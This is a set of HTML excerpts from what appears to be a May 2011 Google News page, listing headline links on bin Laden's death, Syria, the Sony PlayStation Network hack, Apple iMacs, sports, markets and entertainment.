<span><a target="_blank" class="usg-AFQjCNFjnlqtrUY4mDSSvYUkHwp-biTkhQ did-1a56e97f47dfc8e8 article" href="http://www.timesofmalta.com/articles/view/20110503/local/press-freedom-day-new-call-for-freedom-of-information-act.363439" id="MAA4AEgBUAZgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110503/syria-anti-government-protests-crackdown-110503/" class="usg-AFQjCNEAWSqzYU5acWJOfiCAW6jee_afHw did-c03a78ff7fe92d70 article" title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/gVj-iPfkP-a3UM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110503/syria-anti-government-protests-crackdown-110503/" class="usg-AFQjCNEAWSqzYU5acWJOfiCAW6jee_afHw did-c03a78ff7fe92d70 article"> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNFn9tbjlrWNFZZNtbcmPjFutmFaoQ did-c03a78ff7fe92d70 article" href="http://www.voanews.com/english/news/middle-east/Red-Cross-Presses-for-Access-to-Syria-Victims--121146764.html" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.msnbc.msn.com/id/42875850/ns/world_news-europe" target="_blank" class="usg-AFQjCNEzBNKI6GhH9C_MIVhMpqSVDRt6Hg did-a1658d139a6d6e81 article" id="MAA4AEgCUAFgAmoCdXM">France, Germany seek EU sanctions on Syria leaders</a>
...[SNIP]...
<div class="aa-inner"><a href="http://english.aljazeera.net/news/middleeast/2011/05/2011539111756546.html" target="_blank" class="usg-AFQjCNELnG0c9NTsXkJww7I-6G_hRSk8tA did-ae3d3107acb80871 article" id="MAA4AEgCUAJgAmoCdXM">Activist says 1000 arrested in Syria sweep</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGm8J4u4jt4qPMFvMjhaYwSGGviCg did-768b6f7901290f4 article" href="http://www.reuters.com/article/2011/04/30/us-syria-arrests-urgent-idUSTRE73T20X20110430" id="MAA4AEgCUARgAmoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/asia/pakistan/8489658/Osama-bin-Laden-was-not-armed-and-did-not-use-wife-as-human-shield.html" class="usg-AFQjCNEwAirGhXktpTLJiVuUd4eyo63oLA did-89020df329b04b7 article" title="Telegraph.co.uk"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/NHTbzC3UiNdKOM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/asia/pakistan/8489658/Osama-bin-Laden-was-not-armed-and-did-not-use-wife-as-human-shield.html" class="usg-AFQjCNEwAirGhXktpTLJiVuUd4eyo63oLA did-89020df329b04b7 article"> Telegraph.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHzRRU6qa72xfmZQ7x7sM15ej1iZA did-89020df329b04b7 article" href="http://www.reuters.com/article/2011/05/03/us-binladen-usa-brennan-idUSTRE7422WK20110503?feedType=RSS&amp;feedName=domesticNews" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=r8wfzLzWwls">Video:&nbsp;
Globally Bin Laden's Death Draws Relief, Concern
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cnn.com/2011/US/05/03/bin.laden.rice/" target="_blank" class="usg-AFQjCNGNOU-QHh58QCtRCusoBEjX8879pQ did-510cb4cc844ce333 article" id="MAA4AEgDUAFgAmoCdXM">Rice raises concerns over bin Laden&#39;s presence in Pakistan</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHwIPQDP2sXFjju4P4e0BJIBaF6ew did-e16bc2a55273866a article" href="http://www.cbsnews.com/stories/2011/05/03/earlyshow/main20059239.shtml" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFkOyN7EjLM1T7DkCv8qqqT7pXEGg did-1977972bc19e6135 article" href="http://content.usatoday.com/communities/theoval/post/2011/05/obama-laughs-at-bin-laden-joke----a-day-before-raid/1" id="MAA4AEgDUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF-AgSejPmjSpmvD6RL69fEXu1hSA did-bdd001e843f26beb article" href="http://www.mercurynews.com/osama-bin-laden/ci_17979711?source=rss" id="MAA4AEgDUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDn69P8phE2ZJHRUX5gYP9LovVHg did-591e7396aa53f941 article" href="http://www.telegraph.co.uk/news/worldnews/al-qaeda/8489866/WikiLeaks-Bin-Ladens-courier-trained-911-hijack-team.html" id="MAA4AEgDUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span class="wikisense-link">&nbsp;- <a target="_blank" href="http://en.wikipedia.org/wiki/Osama_bin_Laden" class="usg-AFQjCNEKo9yI_sBXiibPflm8RMV-0xg2hw ">Wikipedia:&nbsp;Osama bin Laden</a>
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.dailymail.co.uk/news/article-1382833/Super-Bowl-star-Dave-Duerson-brain-damage-committed-suicide.html" class="usg-AFQjCNFFhtSLzqSE8aM9aUhTU9Wii-0icg did-cee198fad39520b4 article" title="Daily Mail"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt0.ggpht.com/news/tbn/fKa3AnAmqXQSdM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.dailymail.co.uk/news/article-1382833/Super-Bowl-star-Dave-Duerson-brain-damage-committed-suicide.html" class="usg-AFQjCNFFhtSLzqSE8aM9aUhTU9Wii-0icg did-cee198fad39520b4 article"> Daily Mail </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG4ndUITBEi-UiLmhC18Cpp6WpTsA did-cee198fad39520b4 article" href="http://www.foxnews.com/health/2011/05/03/nfl-star-dave-duerson-brain-damage-time-suicide/" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=i_pCzx47sIM">Video:&nbsp;
Adickes: NFL's Concussion Dilemma
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.nytimes.com/2011/05/03/sports/football/03duerson.html" target="_blank" class="usg-AFQjCNFIYJT6uGa4Z7QyvSjnJoXI3CWn9g did-1db8ee8472eec540 article" id="MAA4AEgEUAFgAmoCdXM">Duerson&#39;s Brain Trauma Diagnosed</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJH-R2BC1NOvsncMgVuYMjQCf0Ew did-a8fcc84a5c6b05f7 article" href="http://www.boston.com/news/local/massachusetts/articles/2011/05/03/boston_researchers_say_ex_nfl_safety_duerson_had_brain_damage/" id="MAA4AEgEUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFLWOsf_FQ24-mg9Ph12NNwlIAGuA did-875027ae4d3cf2c2 article" href="http://www.miamiherald.com/2011/05/02/2197793/brain-damage-was-indisputable.html" id="MAA4AEgEUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG66H1nVNq8Zh4pbE52498WvGjjjQ did-d570a24adf49e8f9 article" href="http://www.latimes.com/sports/la-spw-dave-duerson3-sl,0,6798601.storylink?track=rss" id="MAA4AEgEUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span class="wikisense-link">&nbsp;- <a target="_blank" href="http://en.wikipedia.org/wiki/Chronic_traumatic_encephalopathy" class="usg-AFQjCNG-pUZcKebqtiQIkpRzSGJPY92ucg ">Wikipedia:&nbsp;Chronic traumatic encephalopathy</a>
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.siliconrepublic.com/new-media/item/21620-apple-unveils-quad-core/" class="usg-AFQjCNGjR81W0li_xe4RHKLTA5TdDZ6jHQ did-fa15ad8a600ccad6 article" title="Siliconrepublic.com"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt1.ggpht.com/news/tbn/geA8gfnvzZ6JkM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.siliconrepublic.com/new-media/item/21620-apple-unveils-quad-core/" class="usg-AFQjCNGjR81W0li_xe4RHKLTA5TdDZ6jHQ did-fa15ad8a600ccad6 article"> Siliconrepu... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEOyl5JAMfen69wP9QSqqtIqQT74g did-fa15ad8a600ccad6 article" href="http://news.cnet.com/8301-17938_105-20058981-1.html" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.wired.com/gadgetlab/2011/05/new-imacs-with-quad-core-and-thunderbolt/" target="_blank" class="usg-AFQjCNHbSFWwAggi9ReMggkabxDgQW_u6g did-c4cca93881e7e13e article" id="MAA4AEgFUAFgAmoCdXM">New iMacs with Quad-Core and Thunderbolt</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/2011/05/03/us-apple-idUSTRE74234420110503" target="_blank" class="usg-AFQjCNHwtaZy0vqNvZ1WpQzRt885suodsA did-1868f9f49348f785 article" id="MAA4AEgFUAJgAmoCdXM">Apple updates iMac computers with new processors</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVEiYkG9hyXuBGa6Voooi2xlle4Q did-18464fb32613902b article" href="http://mashable.com/2011/05/03/apple-imac-refresh/" id="MAA4AEgFUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhwLCKcRnnkQZ8IBUSdld7mIA03Q did-8cc1f46ca9401ba article" href="http://www.macobserver.com/tmo/article/new_imacs_sport_thunderbolt_quad-core_processors/" id="MAA4AEgFUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH8ZuXUepntxx6x-c4MR0BxyvNuTQ did-51f4d13f5fece72e article" href="http://www.macworld.com/article/159611/2011/05/thunderbolt_imacs.html" id="MAA4AEgFUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNExMgCWaeHfvTusTHOIvKKrYRJ5_A did-7beed96b166d6340 article" href="http://www.appleinsider.com/articles/11/04/30/apple_preparing_to_introduce_sandy_bridge_imacs_early_next_week_sources.html" id="MAA4AEgFUAZgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://feeds.nytimes.com/click.phdo?i=bce54eef1672314bedc3be6ae5691633" class="usg-AFQjCNGARTZg4RYFHunvRptVIx8Fa4YcHw did-5b09e4973f4ae6df article" title="New York Times (blog)"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt2.ggpht.com/news/tbn/dsPjq1dd4KAiFM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://feeds.nytimes.com/click.phdo?i=bce54eef1672314bedc3be6ae5691633" class="usg-AFQjCNGARTZg4RYFHunvRptVIx8Fa4YcHw did-5b09e4973f4ae6df article"> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE4iee7Fm652mx3CiywhQU8EExzhA did-5b09e4973f4ae6df article" href="http://latimesblogs.latimes.com/awards/2011/05/tony-award-nominations-2011.html" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/Entertainment/wireStory?id=13516992" target="_blank" class="usg-AFQjCNGVkDRhAJV0QdrpFcizFaNR70ZEnw did-cff2cfd30ca3acb1 article" id="MAA4AEgGUAJgAmoCdXM">Tony Nominations Announced for Actor, Musical</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEx2Dz8b56VewpR4Q0En1PvK8Zdlw did-65876efb06bbc8e3 article" href="http://feeds.nytimes.com/click.phdo?i=379789f15c7a46ad643bf42519d4160d" id="MAA4AEgGUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGlqlo0aKMfXaNSbaCi4NZgCCygmw did-87bacd3f5709d1c5 article" href="http://www.forbes.com/feeds/ap/2011/05/03/entertainment-us-tony-nominations-actress-musical_8446817.html" id="MAA4AEgGUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFEPkhddzWp--woynO-cKb3DwLyag did-21f8c39811562bc3 article" href="http://culture.wnyc.org/articles/features/2011/may/03/vote-your-favorite-tony-nominee/" id="MAA4AEgGUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFqi7s5wtCoq-hOC1LbXfbJc2YXDg did-f936830f0e3a3370 article" href="http://online.wsj.com/article/SB10001424052748703922804576300840515646976.html?mod=googlenews_wsj" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.chicagotribune.com/news/chi-ap-il-severeweather-cai,0,2213501.story" target="_blank" class="usg-AFQjCNErR7qePL1UBajeL-DsUSbcNNdeIg did-5385aadfe7cf8c7f article" id="MAA4AEgHUAJgAmoCdXM">Level of Mississippi dropping after levee exploded</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE67Ky8lJXj8pZhw5QCLkax2k4NEw did-9f7663ed058c6dda article" href="http://abcnews.go.com/US/army-corps-breaks-missouri-levee-save-cairo-illinois/story?id=13515937" id="MAA4AEgHUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHTlu2489DU2R8-7MnkvF6tJNcxGg did-8d8d79b7afea248c article" href="http://abclocal.go.com/wls/story?section=news/local/illinois&amp;id=8109037" id="MAA4AEgHUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH8PtyDlIS9Z9xbmbBhpKNNI7uMPQ did-b97cab1ebbb45a8f article" href="http://www.stltoday.com/vmix_d7f3075c-7547-11e0-80ed-001a4bcf6878.html" id="MAA4AEgHUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHyQ_pizBrWsbJXgNcY6R2jwdDs9g did-1bf94b1851306e7b article" href="http://www.bozemandailychronicle.com/opinions/article_103d4f88-71c8-11e0-a61c-001cc4c002e0.html" id="MAA4AEgHUAZgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.telegraph.co.uk/technology/sony/8489788/PlayStation-hack-Sony-denies-credit-cards-for-sale-claims.html" class="usg-AFQjCNE9Q2AZgEmRqY6VDBPh1niANAKJcQ did-1bf6b839825fd12e article" title="Telegraph.co.uk"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt3.ggpht.com/news/tbn/H_LpYGaZbWj94M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/technology/sony/8489788/PlayStation-hack-Sony-denies-credit-cards-for-sale-claims.html" class="usg-AFQjCNE9Q2AZgEmRqY6VDBPh1niANAKJcQ did-1bf6b839825fd12e article"> Telegraph.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHTo7J_yZ1NZLBdnDIUpTHlA3ucRQ did-1bf6b839825fd12e article" href="http://news.cnet.com/8301-31021_3-20058950-260.html" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.telegraph.co.uk/technology/sony/8489788/PlayStation-hack-Sony-denies-credit-cards-for-sale-claims.html" target="_blank" class="usg-AFQjCNE9Q2AZgEmRqY6VDBPh1niANAKJcQ did-972ae785e1e5873b article" id="MAA4AEgIUAFgAmoCdXM">PlayStation hack: Sony denies &#39;credit cards for sale&#39; claims</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/news/technology-13265972" target="_blank" class="usg-AFQjCNFOeS6qUy4LbUWArBx7-8wjfJegmw did-8cf98b9d460d321f article" id="MAA4AEgIUAJgAmoCdXM">Latest hack apology from Sony</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGQlerepAtHrY-bWLZ1OCwy2HSibg did-b59093a0b3a30223 article" href="http://www.huffingtonpost.com/2011/05/03/psn-back-online_n_856798.html" id="MAA4AEgIUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUzhSdcghhgAxC7QRbAFofsQDIiw did-1c1bae85cbbcd418 article" href="http://www.pcmag.com/article2/0,2817,2384793,00.asp" id="MAA4AEgIUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFKK_UNtw9wsCqxtCTBYqgReEDRHg did-139e4d9ce72d25f article" href="http://online.wsj.com/article/SB10001424052748704436004576296302384608280.html" id="MAA4AEgIUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span class="wikisense-link">&nbsp;- <a target="_blank" href="http://en.wikipedia.org/wiki/PlayStation_Network_outage" class="usg-AFQjCNGCgszjhVtB7hUI-4E_ynVzc-pkAg ">Wikipedia:&nbsp;PlayStation Network outage</a>
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.latimes.com/sports/basketball/nba/lakers/la-sp-lakers-mavericks-20110503,0,2574310.story" class="usg-AFQjCNEITRJUgcbTJukYzRJkSBWfi62KCQ did-6d51f054548ccdd4 article" title="Los Angeles Times"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt2.ggpht.com/news/tbn/Sk0tSUanMHARUM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.latimes.com/sports/basketball/nba/lakers/la-sp-lakers-mavericks-20110503,0,2574310.story" class="usg-AFQjCNEITRJUgcbTJukYzRJkSBWfi62KCQ did-6d51f054548ccdd4 article"> Los Angeles... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGdpgQxMRVNuGAQJNCdJoe8BTsrSQ did-6d51f054548ccdd4 article" href="http://dallas.sbnation.com/dallas-mavericks/2011/5/3/2150958/mavericks-lakers-win-game-one-96-94" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pjcxY2Do5BA">Video:&nbsp;
Mavericks Rally, Edge Lakers in Game 1
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.ocregister.com/sports/-298846--.html" target="_blank" class="usg-AFQjCNF6XfPqN303mP4N8SMSvPPvvglbbg did-3493a2e03c6c6da5 article" id="MAA4AEgJUAFgAmoCdXM">When will these Lakers be ready for work?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG8MpMsRCLPRvrzssz3j36fkPng5g did-da2b9ab079ee5f55 article" href="http://www.nbclosangeles.com/news/sports/Another-Playoff-Game-Another-Frustrating-Lakers-Performance-121141279.html" id="MAA4AEgJUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGx7Js_HMDrMOhZ2jRueYdaWvOYSA did-b8905270f7d1a588 article" href="http://espn.go.com/blog/dallas/mavericks/post/_/id/4677518/mavs-bigs-win-round-one-vs-andrew-bynum" id="MAA4AEgJUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFz-NVPh623ABDF3qi1d0wXPlULHg did-f9e56cd7231e5445 article" href="http://www.bostonherald.com/sports/columnists/view/20110503strong_finish_helps_mavs_execute_a_stunning_win/srvc=sports&amp;position=also" id="MAA4AEgJUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEITRJUgcbTJukYzRJkSBWfi62KCQ did-ae68f3f053bbf0ac article" href="http://www.latimes.com/sports/basketball/nba/lakers/la-sp-lakers-mavericks-20110503,0,2574310.story" id="MAA4AEgJUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.theglobeandmail.com/report-on-business/industry-news/energy-and-resources/bin-laden-death-saps-safe-haven-appeal-from-precious-metals/article2007121/" class="usg-AFQjCNFniXNkHVoAWL-VZ-IswWvOp3LFuQ did-ac29a753d37fd1a5 article" title="Globe and Mail"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt3.ggpht.com/news/tbn/T31X2cjTOJnobM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/report-on-business/industry-news/energy-and-resources/bin-laden-death-saps-safe-haven-appeal-from-precious-metals/article2007121/" class="usg-AFQjCNFniXNkHVoAWL-VZ-IswWvOp3LFuQ did-ac29a753d37fd1a5 article"> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEsLo9inYtYwxMt1gvMgrKPXL3fXQ did-ac29a753d37fd1a5 article" href="http://www.businessweek.com/ap/financialnews/D9MVEHFG0.htm" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703922804576300760680947204.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNFaKl9UPNfU2AXRCXsnu_xteYGeLw did-40d924474cd312e8 article" id="MAA4AEgKUAFgAmoCdXM">Gold, Silver Continue to Fall</a>
...[SNIP]...
<div class="aa-inner"><a href="http://blogs.barrons.com/focusonfunds/2011/05/03/silver-extends-losses-as-cme-raises-margin-fees-again-to-slow-speculation/?mod=BOLBlog" target="_blank" class="usg-AFQjCNEITIpUTI1fXbrvOvv1xVQZuVz3iA did-781cedabdeab6c09 article" id="MAA4AEgKUAJgAmoCdXM">Silver Extends Losses As CME Raises Margin Fees (Again) To Slow Speculation</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCUGQdxG6VyaNvsWZlxcjTDHzBmQ did-adb0bd45c1079080 article" href="http://www.bloomberg.com/news/2011-05-02/silver-futures-plunge-most-since-2008-as-cme-group-increases-margins-13-.html" id="MAA4AEgKUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGM_p4s4TTfMvungq6_9v46TbfXxA did-9c2d04b185d6c5d9 article" href="http://feeds.nytimes.com/click.phdo?i=af68003a90ca9672b05e3b07f391c6a3" id="MAA4AEgKUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFDxIdF9P7floaDvcNA6Zi5rJDCPg did-30f45fa5b70ac75c article" href="http://www.marketwatch.com/story/gold-silver-futures-extend-losses-2011-05-02" id="MAA4AEgKUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.foxnews.com/world/2011/05/02/hamas-leader-condemns-killing-usama-bin-laden/" class="usg-AFQjCNGVuTDKGTMUTpTgyF4RJ4k-RbSr5A did-8c3d8e84e024361d article" title="Fox News"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt2.ggpht.com/news/tbn/-sZQW2wQ0YYXiM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/world/2011/05/02/hamas-leader-condemns-killing-usama-bin-laden/" class="usg-AFQjCNGVuTDKGTMUTpTgyF4RJ4k-RbSr5A did-8c3d8e84e024361d article"> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFjkNuyHff3ONFr_9Gv8kPexb3u4w did-8c3d8e84e024361d article" href="http://news.xinhuanet.com/english2010/world/2011-05/03/c_13857131.htm" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.monstersandcritics.com/news/middleeast/news/article_1636733.php/Remaining-Palestinian-factions-agree-on-Hamas-Fatah-deal" target="_blank" class="usg-AFQjCNF6PiUJ0jfx_1XBfeVpGwhFDVCOxg did-7f83c82c527f5c55 article" id="MAA4AEgLUAFgAmoCdXM">Remaining Palestinian factions agree on Hamas-Fatah deal</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.haaretz.com/news/diplomacy-defense/hamas-pledges-to-honor-truce-with-israel-after-forming-unity-government-1.359597" target="_blank" class="usg-AFQjCNH5gDHZ0u92xLPWRpAGzkLBMwSACA did-985622f881b181ef article" id="MAA4AEgLUAJgAmoCdXM">Hamas pledges to honor truce with Israel after forming unity government</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG4mCklvvCSpff4I8FHTcQU427gHw did-59361f7957fa2868 article" href="http://www.washingtonpost.com/blogs/right-turn/post/hamas-hearts-al-qaeda/2011/03/29/AFlmF1eF_blog.html" id="MAA4AEgLUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGuOH0D0xtacIOnK2TpT34-BSApeg did-260234fd0a14475f article" href="http://www.jta.org/news/article/2011/05/02/3087271/could-us-still-fund-pa-that-includes-hamas" id="MAA4AEgLUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://content.usatoday.com/communities/entertainment/post/2011/05/prince-charles-goes-to-dc-will-and-kate-headed-for-hollywood-/1" class="usg-AFQjCNGS0ZjvtzlW1fh66IF5eQBhzWGiWg did-6297527f5ae0525c article" title="USA Today"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt1.ggpht.com/news/tbn/OUuTFlc5Ayz-yM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://content.usatoday.com/communities/entertainment/post/2011/05/prince-charles-goes-to-dc-will-and-kate-headed-for-hollywood-/1" class="usg-AFQjCNGS0ZjvtzlW1fh66IF5eQBhzWGiWg did-6297527f5ae0525c article"> USA Today </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFvro1sFz8_1kMDmLYMbFJWXjr-Hw did-6297527f5ae0525c article" href="http://www.people.com/people/package/article/0,,20395222_20486492,00.html" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/entertainment/post/2011/05/prince-charles-goes-to-dc-will-and-kate-headed-for-hollywood-/1" target="_blank" class="usg-AFQjCNGS0ZjvtzlW1fh66IF5eQBhzWGiWg did-1d97dd86c719af7a article" id="MAA4AEgMUAFgAmoCdXM">Prince Charles goes to DC; Will and Kate headed for Hollywood?</a>
...[SNIP]...
<div class="aa-inner"><a href="http://celebrity-gossip.net/node/502064" target="_blank" class="usg-AFQjCNGaPdJITqJM-HhisHfh_VDsrUStQQ did-1f912974c21f5d11 article" id="MAA4AEgMUAJgAmoCdXM">Prince William &amp; Duchess Catherine: Hollywood Bound?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFM8r0mYfDYO5duzthHdEwrIpiuOA did-ffff274cd873b367 article" href="http://www.deadline.com/2011/05/report-royal-newlyweds-to-visit-hollywood/" id="MAA4AEgMUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGLVgIVaxgDt6hA1Ll7Ft0CcaCcqg did-2aa7afd24c0bcaab article" href="http://www.movieline.com/2011/05/lets-plan-william-and-kates-hollywood-itinerary.php" id="MAA4AEgMUARgAmoCdXM"><span class="titletext">
...[SNIP]...
